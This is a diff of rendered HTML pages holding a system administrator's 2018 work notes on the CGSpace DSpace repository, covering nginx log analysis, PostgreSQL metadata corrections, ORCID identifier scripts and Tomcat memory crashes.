  • I made a pull request to fix it ([#354](https://github.com/ilri/DSpace/pull/354))
  • I should remember to update existing values in PostgreSQL too:
  • -
    dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
    +
    dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
     UPDATE 2
     

    2018-02-18

      @@ -646,13 +645,13 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
     168571
    -# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | wc -l
    +# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | wc -l
     8188
     
    • Only 8,000 requests during those four hours, out of 170,000 the whole day!
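The pattern used throughout these notes (filter log lines by a timestamp regex, then tally the first field) can be sketched in Python as well. This assumes the client address is the first whitespace-separated field, as `awk '{print $1}'` does; the function name and the sample lines, which use documentation-range addresses, are hypothetical.

```python
import re
from collections import Counter


def top_clients(lines, window, n=10):
    """Count requests per client for lines whose text matches `window`."""
    pattern = re.compile(window)
    counts = Counter()
    for line in lines:
        fields = line.split(None, 1)
        if fields and pattern.search(line):
            counts[fields[0]] += 1  # first field is the client address
    return counts.most_common(n)


# Hypothetical access-log lines, not taken from the real server.
sample = [
    '192.0.2.10 - - [15/Feb/2018:16:02:11 +0000] "GET / HTTP/1.1" 200 512',
    '192.0.2.20 - - [15/Feb/2018:18:40:03 +0000] "GET / HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Feb/2018:19:15:45 +0000] "GET / HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Feb/2018:17:00:00 +0000] "GET / HTTP/1.1" 200 512',
]
for client, hits in top_clients(sample, r"15/Feb/2018:(16|18|19|20)"):
    print(f"{hits:7d} {client}")
```

Unlike the shell pipeline, this lists the busiest clients first.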
    • And the usage of XMLUI, REST, and OAI looks SUPER boring:
    -
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         111 95.108.181.88
         158 45.5.184.221
         201 104.196.152.243
    @@ -677,7 +676,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
     
    • Combined list of CGIAR author ORCID iDs is up to 1,500:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l  
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l  
     1571
     
    • I updated my resolve-orcids-from-solr.py script to be able to resolve ORCID identifiers from a text file so I renamed it to resolve-orcids.py
    • @@ -692,13 +691,13 @@ Ahmad Maryudi: 0000-0001-5051-7217
    Looking up the name associated with ORCID iD: 0000-0001-9634-1958
     Traceback (most recent call last):
    -  File "./resolve-orcids.py", line 111, in <module>
    +  File "./resolve-orcids.py", line 111, in <module>
         read_identifiers_from_file()
    -  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
    +  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
         resolve_orcid_identifiers(orcids)
    -  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    -    family_name = data['name']['family-name']['value']
    -TypeError: 'NoneType' object is not subscriptable
    +  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    +    family_name = data['name']['family-name']['value']
    +TypeError: 'NoneType' object is not subscriptable
     
    • According to ORCID that identifier’s family-name is null so that sucks
    • I fixed the script so that it checks if the family name is null
    • @@ -706,13 +705,13 @@ TypeError: 'NoneType' object is not subscriptable
    Looking up the name associated with ORCID iD: 0000-0002-1300-3636
     Traceback (most recent call last):
    -  File "./resolve-orcids.py", line 117, in <module>
    +  File "./resolve-orcids.py", line 117, in <module>
         read_identifiers_from_file()
    -  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
    +  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
         resolve_orcid_identifiers(orcids)
    -  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    -    if data['name']['given-names']:
    -TypeError: 'NoneType' object is not subscriptable
    +  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    +    if data['name']['given-names']:
    +TypeError: 'NoneType' object is not subscriptable
     
    • According to ORCID that identifier’s entire name block is null!
    @@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
  • Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we’ll now only use ORCID iDs that have been sent to us by partners, not those extracted via keyword searches on orcid.org
  • This should be the version we use (the existing controlled vocabulary generated from CGSpace’s Solr authority core plus the IDs sent to us so far by partners):
  • -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-02-20-combined.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-02-20-combined.txt
     
    • I updated the resolve-orcids.py to use the “credit-name” if it exists in a profile, falling back to “given-names” + “family-name”
    • Also, I added color-coded output to the debug messages and added a “quiet” mode that suppresses the normal behavior of printing results to the screen
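The name-selection logic described above can be sketched roughly as follows. This is not the actual code from resolve-orcids.py: the function name is hypothetical, and it assumes the record is a dict shaped like the `data['name']['family-name']['value']` access in the tracebacks, with `credit-name` and `given-names` stored the same way.

```python
def pick_display_name(data):
    """Prefer 'credit-name', else 'given-names' + 'family-name', else None."""
    name = data.get("name")
    if name is None:
        return None  # the whole name block is null

    def value_of(key):
        # Each entry is either null or a dict with a 'value' key.
        entry = name.get(key)
        return entry.get("value") if entry else None

    credit = value_of("credit-name")
    if credit:
        return credit
    # Keep whichever of the two parts is present and non-empty.
    parts = [part for part in (value_of("given-names"), value_of("family-name")) if part]
    return " ".join(parts) if parts else None


# Hypothetical records covering the cases in the test input.
print(pick_display_name({"name": None}))
print(pick_display_name({"name": {"given-names": {"value": "Nor Azwadi"}, "family-name": None}}))
```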
    • I’m using this as the test input for resolve-orcids.py:
    $ cat orcid-test-values.txt 
    -# valid identifier with 'given-names' and 'family-name'
    +# valid identifier with 'given-names' and 'family-name'
     0000-0001-5019-1368
     
     # duplicate identifier
    @@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
     # invalid identifier
     0000-0001-9634-19580
     
    -# has a 'credit-name' value we should prefer
    +# has a 'credit-name' value we should prefer
     0000-0002-1735-7458
     
    -# has a blank 'credit-name' value
    +# has a blank 'credit-name' value
     0000-0001-5199-5528
     
    -# has a null 'name' object
    +# has a null 'name' object
     0000-0002-1300-3636
     
    -# has a null 'family-name' value
    +# has a null 'family-name' value
     0000-0001-9634-1958
     
     # missing ORCID identifier
    @@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
     
  • It looks like Sisay restarted Tomcat because I was offline
  • There was absolutely nothing interesting going on at 13:00 on the server, WTF?
  • -
    # cat /var/log/nginx/*.log | grep -E "22/Feb/2018:13" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/*.log | grep -E "22/Feb/2018:13" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          55 192.99.39.235
          60 207.46.13.26
          62 40.77.167.38
    @@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
     
    • Otherwise there was pretty normal traffic the rest of the day:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         839 216.244.66.245
        1074 68.180.228.117
        1114 157.55.39.100
    @@ -798,9 +797,9 @@ TypeError: 'NoneType' object is not subscriptable
     
    • So I don’t see any definite cause for this crash, but I do see a shit ton of abandoned PostgreSQL connections today around 1PM!
    -
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
    +
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
     729
    -# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' 
    +# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' 
     519
     
    • I think the removeAbandonedTimeout might still be too low (I increased it from 60 to 90 seconds last week)
    • @@ -820,12 +819,12 @@ TypeError: 'NoneType' object is not subscriptable
    • A few days ago Abenet sent me the list of ORCID iDs from CCAFS
    • We currently have 988 unique identifiers:
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l          
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l          
     988
     
    • After adding the ones from CCAFS we now have 1004:
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
     1004
     
    • I will add them to DSpace Test but Abenet says she’s still waiting to send us ILRI’s list
    • @@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
    • The query in Solr would simply be orcid_id:*
    • Assuming I know the authority record has id:d7ef744b-bbd4-4171-b449-00e37e1b776f, I could query PostgreSQL for all metadata records using that authority:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
      metadata_value_id | resource_id | metadata_field_id |        text_value         | text_lang | place |              authority               | confidence | resource_type_id 
     -------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
                2726830 |       77710 |                 3 | Rodríguez Chalarca, Jairo |           |     2 | d7ef744b-bbd4-4171-b449-00e37e1b776f |        600 |                2
    @@ -896,18 +895,18 @@ Nor Azwadi: 0000-0001-9634-1958
     
  • I need to see which SQL queries are run during that time
  • And only a few hours after I disabled the removeAbandoned thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
         279 dspaceWeb
    -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
    +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
     218
     
    • So I’m re-enabling the removeAbandoned setting
    • I grabbed a snapshot of the active connections in pg_stat_activity for all queries running longer than 2 minutes:
    -
    dspace=# \copy (SELECT now() - query_start as "runtime", application_name, usename, datname, waiting, state, query
    +
    dspace=# \copy (SELECT now() - query_start as "runtime", application_name, usename, datname, waiting, state, query
       FROM  pg_stat_activity
    -  WHERE now() - query_start > '2 minutes'::interval
    +  WHERE now() - query_start > '2 minutes'::interval
      ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
     COPY 263
     
      @@ -936,7 +935,7 @@ COPY 263
    • CGSpace crashed today, the first HTTP 499 in nginx’s access.log was around 09:12
    • There’s nothing interesting going on in nginx’s logs around that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Feb/2018:09:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Feb/2018:09:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          65 197.210.168.174
          74 213.55.99.121
          74 66.249.66.90
    @@ -955,7 +954,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
     
    • Memory issues seem to be common this month:
    -
    $ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-* 
    +
    $ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-* 
     dspace.log.2018-02-01:0
     dspace.log.2018-02-02:0
     dspace.log.2018-02-03:0
    @@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
     
    • Top ten users by session during the first twenty minutes of 9AM:
    -
    $ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
    +
    $ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
          18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
          19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
          21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
    @@ -1006,7 +1005,7 @@ dspace.log.2018-02-28:1
     
  • I think I’ll increase the JVM heap size on CGSpace from 6144m to 8192m because I’m sick of this random crashing shit and the server has memory and I’d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work
  • Run the few corrections from earlier this month for sponsor on CGSpace:
  • -
    cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
    +
    cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
     UPDATE 3
     
    • I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)
    diff --git a/docs/2018-03/index.html b/docs/2018-03/index.html
    index 16cd9a544..a158fb047 100644
    --- a/docs/2018-03/index.html
    +++ b/docs/2018-03/index.html
    @@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
     Export a CSV of the IITA community metadata for Martin Mueller
     "/>
    -
    +
    @@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
    • There were some records using a non-breaking space in their AGROVOC subject field
    • I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace
    -
    $ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3      
    -$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
    +
    $ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    +$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
     
    • This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character
    • Add new CRP subject “GRAIN LEGUMES AND DRYLAND CEREALS” to input-forms.xml (#358)
    • @@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
    • Run all system updates on DSpace Test and reboot server
    • I ran the orcid-authority-to-item.py script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata
    -
    $ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
    +
    $ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
     
    • I ran the DSpace cleanup script on CGSpace and it threw an error (as always):
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(150659) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(150659) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
     UPDATE 1
     
    • Apply the proposed PostgreSQL indexes from DS-3636 (pull request #1791) on CGSpace (linode18)
    @@ -180,7 +180,7 @@ UPDATE 1
      es
     (16 rows)
    -dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
    +dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
     UPDATE 122227
     dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
      text_lang
    @@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
    • On second inspection it looks like dc.description.provenance fields use the text_lang “en” so that’s probably why there are over 100,000 fields changed…
    • If I skip that, there are about 2,000, which seems more like the number of fields users have edited manually, or fucked up during CSV import, etc:
    -
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
    +
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
     UPDATE 2309
     
    • I will apply this on CGSpace right now
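The rule behind the second `UPDATE` can be written out as a small function, which makes it easy to test before touching the database. This is a minimal sketch, assuming the variant list is exactly the one in the query; `normalize_text_lang` is a hypothetical helper name, and plain `en` is deliberately left alone because `dc.description.provenance` uses it.

```python
# Variants to rewrite, copied from the second UPDATE in the notes.
# Plain "en" is left out on purpose (used by dc.description.provenance).
VARIANTS = {"EN", "En", "en_", "EN_US", "en_U", "eng"}


def normalize_text_lang(value):
    """Return 'en_US' for a known malformed variant, otherwise the value unchanged."""
    return "en_US" if value in VARIANTS else value


for candidate in ["eng", "EN_US", "en", "es", None]:
    print(repr(candidate), "->", repr(normalize_text_lang(candidate)))
```

Anything not in the set, including `NULL` values (represented here as `None`) and other languages, passes through untouched, which matches the `text_lang in (...)` filter.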
    • @@ -207,11 +207,11 @@ UPDATE 2309
    • Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the cg.creator.id field
    • For example, a GREL expression in a custom text facet to get all items with dc.contributor.author[en_US] of a certain author with several name variations (this is how you use a logical OR in OpenRefine):
    -
    or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
    +
    or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
     
    • Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:
    -
    if(isBlank(value), "Hernan Ceballos: 0000-0002-8744-7918", value + "||Hernan Ceballos: 0000-0002-8744-7918")
    +
    if(isBlank(value), "Hernan Ceballos: 0000-0002-8744-7918", value + "||Hernan Ceballos: 0000-0002-8744-7918")
     
    • One thing that bothers me is that this won’t honor author order
    • It might be better to do batches of these in PostgreSQL with a script that takes the place column of an author into account when setting the cg.creator.id
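For reference, the GREL conditional above (set the value if the cell is blank, otherwise append with `||`) looks like this in Python. It is only a sketch of the same logic, assuming a cell is "blank" when it is `None` or an empty string; `add_orcid` is a hypothetical name, and like the GREL version it does nothing about author order.

```python
def add_orcid(value, tag, separator="||"):
    """Set the ORCID tag on an empty cell, or append it to an existing value."""
    # Assumption: "blank" means None or an empty string.
    if value is None or value == "":
        return tag
    return value + separator + tag


tag = "Hernan Ceballos: 0000-0002-8744-7918"
print(add_orcid("", tag))
print(add_orcid("Alan S. Orth: 0000-0002-1735-7458", tag))
```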
    • @@ -219,8 +219,8 @@ UPDATE 2309
    • The CSV should have two columns: author name and ORCID identifier:
    dc.contributor.author,cg.creator.id
    -"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458
    -"Orth, A.",Alan S. Orth: 0000-0002-1735-7458
    +"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458
    +"Orth, A.",Alan S. Orth: 0000-0002-1735-7458
     
    • I didn’t integrate the ORCID API lookup for author names in this script for now because I was only interested in “tagging” old items for a few given authors
    • I added ORCID identifiers for 187 items by CIAT’s Hernan Ceballos, because that is what Elizabeth was trying to do manually!
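To illustrate the two-column CSV format described above, here is a minimal sketch of reading it into a mapping of author name variations to ORCID tags. This is not the actual script from these notes; `load_author_orcids` is a hypothetical helper, and the sample data is the example from the notes.

```python
import csv
import io


def load_author_orcids(handle):
    """Map each author name variation to its ORCID tag from a two-column CSV."""
    reader = csv.DictReader(handle)
    return {row["dc.contributor.author"]: row["cg.creator.id"] for row in reader}


# Same rows as the example CSV in the notes; names are quoted because they contain commas.
sample = io.StringIO(
    "dc.contributor.author,cg.creator.id\n"
    '"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458\n'
    '"Orth, A.",Alan S. Orth: 0000-0002-1735-7458\n'
)

mapping = load_author_orcids(sample)
for name, orcid in mapping.items():
    print(name, "=>", orcid)
```

Using `csv.DictReader` rather than splitting on commas matters here, because the author names themselves contain commas inside the quotes.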
    @@ -240,10 +240,10 @@ UPDATE 2309
     g/jspui/listings-and-reports
     -- Method: POST
     -- Parameters were:
    --- selected_admin_preset: "ilri authors2"
    --- load: "normal"
    --- next: "NEXT STEP >>"
    --- step: "1"
    +-- selected_admin_preset: "ilri authors2"
    +-- load: "normal"
    +-- next: "NEXT STEP >>"
    +-- step: "1"
     org.apache.jasper.JasperException: java.lang.NullPointerException
      @@ -295,7 +295,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
    • I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164
    • Looking at the CRP subjects on CGSpace I see there is one blank one so I’ll just fix it:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
     
    • Copy all CRP subjects to a CSV to do the mass updates:
    @@ -304,7 +304,7 @@ COPY 21
    • Once I prepare the new input forms (#362) I will need to do the batch corrections:
    -
    $ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
    +
    $ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
     
    • Create a pull request to update the input forms for the new CRP subject style (#366)
    @@ -322,7 +322,7 @@ COPY 21
    • But these errors, I don’t even know what they mean, because a handful of them happen every day:
    -
    $ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
    +
    $ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
     dspace.log.2018-03-10:13
     dspace.log.2018-03-11:15
     dspace.log.2018-03-12:13
    @@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
     
    • There wasn’t even a lot of traffic at the time (8–9 AM):
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Mar/2018:0[89]:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Mar/2018:0[89]:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          92 40.77.167.197
          92 83.103.94.48
          96 40.77.167.175
    @@ -351,7 +351,7 @@ dspace.log.2018-03-19:90
     
  • Well there is a hint in Tomcat’s catalina.out:
  • Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
    -Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
     
    • So someone was doing something heavy somehow… my guess is content and usage stats!
    • ICT responded that they “fixed” the CGSpace connectivity issue in Nairobi without telling me the problem
    • @@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    • Abenet told me that one of Lance Robinson’s ORCID iDs on CGSpace is incorrect
    • I will remove it from the controlled vocabulary (#367) and update any items using the old one:
    -
    dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
    +
    dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
     UPDATE 1
     
    • Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits
    • Merge the changes to CRP names to the 5_x-prod branch and deploy on CGSpace (#363)
    • Run corrections for CRP names in the database:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
     
    • Run all system updates on CGSpace (linode18) and reboot the server
    • I started a full Discovery re-index on CGSpace because of the updated CRPs
    • I see this error in the DSpace log:
    -
    2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field "dc_contributor_author".
    -java.lang.IllegalArgumentException: No choices plugin was configured for  field "dc_contributor_author".
    +
    2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field "dc_contributor_author".
    +java.lang.IllegalArgumentException: No choices plugin was configured for  field "dc_contributor_author".
             at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
             at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
             at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
    @@ -415,15 +415,15 @@ java.lang.IllegalArgumentException: No choices plugin was configured for  field
     
  • Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!
  • Since we’ve migrated the ORCID identifiers associated with the authority data to the cg.creator.id field we can nullify the authorities remaining in the database:
  • -
    dspace=# UPDATE metadatavalue SET authority=NULL WHERE resource_type_id=2 AND metadata_field_id=3 AND authority IS NOT NULL;
    -UPDATE 195463
    -
      +
      dspace=# UPDATE metadatavalue SET authority=NULL WHERE resource_type_id=2 AND metadata_field_id=3 AND authority IS NOT NULL;
      +UPDATE 195463
      +
      • After this the indexing works as usual and item counts and facets are back to normal
      • Send Peter a list of all authors to correct:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv header;
      -COPY 56156
      -
        +
        dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv header;
        +COPY 56156
        +
        • Afterwards we’ll want to do some batch tagging of ORCID identifiers to these names
        • CGSpace crashed again this afternoon, I’m not sure of the cause but there are a lot of SQL errors in the DSpace log:
        @@ -432,7 +432,7 @@ java.sql.SQLException: Connection has already been closed.
    • I have no idea why so many connections were abandoned this afternoon:
    -
    # grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
    +
    # grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
     268
     
    • DSpace Test crashed again due to Java heap space, this is from the DSpace log:
    • @@ -448,7 +448,7 @@ java.lang.OutOfMemoryError: Java heap space
    • But there are tons of heap space errors on DSpace Test actually:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     319
     
    • I guess we need to give it more RAM because it now has CGSpace’s large Solr core
    • @@ -521,8 +521,8 @@ sys 2m45.135s

      Test the corrections and deletions locally, then run them on CGSpace:

